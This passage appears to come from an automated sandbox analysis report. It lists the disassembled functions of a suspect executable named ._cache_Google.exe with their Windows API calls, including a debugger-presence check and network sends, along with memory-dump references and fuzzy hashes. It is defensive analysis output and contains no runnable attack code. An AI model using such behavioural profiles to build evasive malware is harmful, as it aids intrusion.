                                                                                                                                                                              • API String ID: 539440098-3062634219
                                                                                                                                                                              • Opcode ID: a7f3a0ce2301733d287e901eb8c550a673ce7e07c52929fc54a244e1c6c4ee72
                                                                                                                                                                              • Instruction ID: abebb5deac6055bb8c2f15f0c936b08867252f837b421131d1347d02479ec9ec
                                                                                                                                                                              • Opcode Fuzzy Hash: a7f3a0ce2301733d287e901eb8c550a673ce7e07c52929fc54a244e1c6c4ee72
                                                                                                                                                                              • Instruction Fuzzy Hash: 99E0B636400218BBDB20AF94E805A9ABBB9EB04354F10455AF94195151D7B5AA14DBA4
                                                                                                                                                                              Function 004CF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5ca553f360d291f1fb296d4b9c59d5bb64d886abf53d8e384ab9945129620d09
                                                                                                                                                                              • Instruction ID: 45a4e8977eb46c4f5bc00c377abdbcc8b98326da1801126794a19e4797f05f73
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ca553f360d291f1fb296d4b9c59d5bb64d886abf53d8e384ab9945129620d09
                                                                                                                                                                              • Instruction Fuzzy Hash: D651C1352043019FCB14EF25D491BAA77E5BF89314F14856EF9568B2D2CB38E809CB6A
                                                                                                                                                                              Function 00508065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00508074
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0050807A
                                                                                                                                                                                • Part of subcall function 00506B19: GetWindowRect.USER32(?,?), ref: 00506B2C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CursorForegroundRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1066937146-0
                                                                                                                                                                              • Opcode ID: 71003e5941d607f4631c9d7d8f5e71427102684bf917280bc98361b674571713
                                                                                                                                                                              • Instruction ID: 66b498a50c05f33b4799977fb8af114c25bb5713c97dbd550bef131813575d69
                                                                                                                                                                              • Opcode Fuzzy Hash: 71003e5941d607f4631c9d7d8f5e71427102684bf917280bc98361b674571713
                                                                                                                                                                              • Instruction Fuzzy Hash: 25311B75900208AFDB00EFA5CD81BEEB7B8FF14314F10442EE945A7251DB78AE55CB64
                                                                                                                                                                              Function 004B1DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0052DB31
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0052DB6B
                                                                                                                                                                                • Part of subcall function 004B1F04: GetForegroundWindow.USER32 ref: 004B1FBE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Foreground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 62970417-0
                                                                                                                                                                              • Opcode ID: 3bbaf4ea2bd4c9afd065ecf1dacfae6e69b520785633781ad2c4c8f1008c20fe
                                                                                                                                                                              • Instruction ID: c2f8fe88e29195fd7243b942c92b065c62da93bf1b095b40ca11aa862c0de06b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3bbaf4ea2bd4c9afd065ecf1dacfae6e69b520785633781ad2c4c8f1008c20fe
                                                                                                                                                                              • Instruction Fuzzy Hash: C621D272600206ABDB14AB35C8A1BFE77BDAF41388F00042EF95A87191DB78ED05D774
                                                                                                                                                                              Function 004EE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EE344
                                                                                                                                                                              • _strlen.LIBCMT ref: 004EE34F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout_strlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2777139624-0
                                                                                                                                                                              • Opcode ID: 741191d89bbe8164add2fe97a6b2dc2c7d3fc5bc37f9aa7e84b8ed35414e5bcb
                                                                                                                                                                              • Instruction ID: 08dd2898c73a937727cc06f257d9109110d13e8eba5731b8ffa6c319ad0174a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 741191d89bbe8164add2fe97a6b2dc2c7d3fc5bc37f9aa7e84b8ed35414e5bcb
                                                                                                                                                                              • Instruction Fuzzy Hash: 9111A73120020467CB04BB6BDCD6DFF7BA99F45345F00443FFA069B292DE69984696AC
                                                                                                                                                                              Function 004B3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 004B36E6
                                                                                                                                                                                • Part of subcall function 004D2025: __lock.LIBCMT ref: 004D202B
                                                                                                                                                                                • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004B32F6
                                                                                                                                                                                • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B330B
                                                                                                                                                                                • Part of subcall function 004B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                                                                                                                                                • Part of subcall function 004B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                                                                                                                                                • Part of subcall function 004B374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00571120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00571124,?,?), ref: 004B37EE
                                                                                                                                                                                • Part of subcall function 004B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 004B3726
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 924797094-0
                                                                                                                                                                              • Opcode ID: 050163f46e453c087ebe81ad0d132e1692c7d5bad9171f808d424ddcafeeaf69
                                                                                                                                                                              • Instruction ID: 094cdf020daba62ab795a9436f7a8f4448547bf3e8ca8dd01a1a2c502bec4b76
                                                                                                                                                                              • Opcode Fuzzy Hash: 050163f46e453c087ebe81ad0d132e1692c7d5bad9171f808d424ddcafeeaf69
                                                                                                                                                                              • Instruction Fuzzy Hash: F01193719143419FC310DF2AED4991ABBF8FFA4714F00491FF448872A1DBB49588EB9A
                                                                                                                                                                              Function 004B4B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,004B4C2B,?,?,?,?,004BBE63), ref: 004B4BB6
                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,004B4C2B,?,?,?,?,004BBE63), ref: 00524972
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                              • Opcode ID: 708351bc736a5c90365b09c525a9243c962a006c2869c7e58ddba1f604887bd7
                                                                                                                                                                              • Instruction ID: fd256eaf3892a9e6237b32f2d401c2ffac7a26484b7788df138487a3c9d51ce2
                                                                                                                                                                              • Opcode Fuzzy Hash: 708351bc736a5c90365b09c525a9243c962a006c2869c7e58ddba1f604887bd7
                                                                                                                                                                              • Instruction Fuzzy Hash: 17018470148308BEF3244E289C8AFA63AECEB05768F108319BBE55A1E1C6B56D45DB24
                                                                                                                                                                              Function 004CF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                                • Part of subcall function 004CF2D0: _memmove.LIBCMT ref: 004CF307
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                              • Opcode ID: 1318d84607bb7dc4a804d018751db117afc87f2aca195b101e863cf713550b7a
                                                                                                                                                                              • Instruction ID: ee5fa310988cb3d5d6ebc62db335f1ff9ba4b08e45151375cbb9180b9c7413b9
                                                                                                                                                                              • Opcode Fuzzy Hash: 1318d84607bb7dc4a804d018751db117afc87f2aca195b101e863cf713550b7a
                                                                                                                                                                              • Instruction Fuzzy Hash: 22F044BA104114BFAB10AB66EC44DBB7FADEF86360700802BFD08CB211D63ADC04D6B5
                                                                                                                                                                              Function 004DF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___lock_fhandle.LIBCMT ref: 004DF7D9
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004DF7F2
                                                                                                                                                                                • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1046115767-0
                                                                                                                                                                              • Opcode ID: 5cd6457b4c6c2f7d948903466a6a16263e6637314eac679a408c893d1d56d30d
                                                                                                                                                                              • Instruction ID: 1ab5f701e85ddb78587e8c9069bb1b38cfc47135809ac95b5d2146f1105c31f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd6457b4c6c2f7d948903466a6a16263e6637314eac679a408c893d1d56d30d
                                                                                                                                                                              • Instruction Fuzzy Hash: E71102328056108EC7217FA598623593A906F42338F56026BF4265F3E3CBBC5944A6AE
                                                                                                                                                                              Function 00509500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 00509534
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000,?,00000000,00000000), ref: 00509557
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastsend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1802528911-0
                                                                                                                                                                              • Opcode ID: b284e7403d9217bbcd7de260a76e1fc5add7e88c19910715d8d902d871b6170e
                                                                                                                                                                              • Instruction ID: 19d945cf281765b44f32628278e9dff7e07678001fa8adf6b8444e19c5d542e9
                                                                                                                                                                              • Opcode Fuzzy Hash: b284e7403d9217bbcd7de260a76e1fc5add7e88c19910715d8d902d871b6170e
                                                                                                                                                                              • Instruction Fuzzy Hash: 030121352002049FD714EB25D891B6AB7F9EF99724F10851EE65A87391CA74EC05CB94
                                                                                                                                                                              Function 004D010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                                • Part of subcall function 004D7495: RaiseException.KERNEL32(?,?,004B125D,00566598,?,?,?,004D0158,004B125D,00566598,?,00000001), ref: 004D74E6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3902256705-0
                                                                                                                                                                              • Opcode ID: 859c0e2fcc7aa960c58d45255f6ed6d6b0b0e880af35b3c00fb2180243d5ecce
                                                                                                                                                                              • Instruction ID: e24d9b2e1f6263688cd7bfb0a4c5a3ed1e0e8e229980248f8df6e50d5494373a
                                                                                                                                                                              • Opcode Fuzzy Hash: 859c0e2fcc7aa960c58d45255f6ed6d6b0b0e880af35b3c00fb2180243d5ecce
                                                                                                                                                                              • Instruction Fuzzy Hash: EFF0C83510420EA6C715ABA9ED22ADE7BFCBF05354F10041FF905D3382DBB98690D6AD
                                                                                                                                                                              Function 004D4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __lock_file.LIBCMT ref: 004D42B9
                                                                                                                                                                                • Part of subcall function 004D5A9F: __lock.LIBCMT ref: 004D5AC2
                                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 004D42C4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2800547568-0
                                                                                                                                                                              • Opcode ID: b7f2c17ae74e56034f8504186c91a8b410ae9351451676d3354b03655629e646
                                                                                                                                                                              • Instruction ID: 553b7fe928dea43ed6394665b8335ad91dc171379bae0c730a3aaa8710df2590
                                                                                                                                                                              • Opcode Fuzzy Hash: b7f2c17ae74e56034f8504186c91a8b410ae9351451676d3354b03655629e646
                                                                                                                                                                              • Instruction Fuzzy Hash: B2F090319017149BD710BB76881276E7BD06F81378F61828FB864AB3C2DB7C9A019F5D
                                                                                                                                                                              Function 004CF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • timeGetTime.WINMM ref: 004CF57A
                                                                                                                                                                                • Part of subcall function 004BE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 005275D3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1792118007-0
                                                                                                                                                                              • Opcode ID: 489b4ccdfcaf5bf114c138de27a5754bad15c3243a2eebfd0b3319dd410d5f9a
                                                                                                                                                                              • Instruction ID: 77a9076478cc416f859cc2878c933cf50960aba5599cce90ab285898ac20ff69
                                                                                                                                                                              • Opcode Fuzzy Hash: 489b4ccdfcaf5bf114c138de27a5754bad15c3243a2eebfd0b3319dd410d5f9a
                                                                                                                                                                              • Instruction Fuzzy Hash: 11F058752002159BD354EB6AE445BA6BBE8AF58324F00002AF85AC7351DB70A904CBE5
                                                                                                                                                                              Function 004B81C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 004B83C4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 712828618-0
                                                                                                                                                                              • Opcode ID: 243962e30963556cc636970411bfd90336c81835439d28383a1875599729c451
                                                                                                                                                                              • Instruction ID: edbc16f91d8ffeb1da215384104961b8440c714773d85e092e1ddcd255ea20e0
                                                                                                                                                                              • Opcode Fuzzy Hash: 243962e30963556cc636970411bfd90336c81835439d28383a1875599729c451
                                                                                                                                                                              • Instruction Fuzzy Hash: A7F16B75508302AFC704DF19C8918AFBBE9FF99304F54891EF88597261EB38E905CB66
                                                                                                                                                                              Function 004C4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
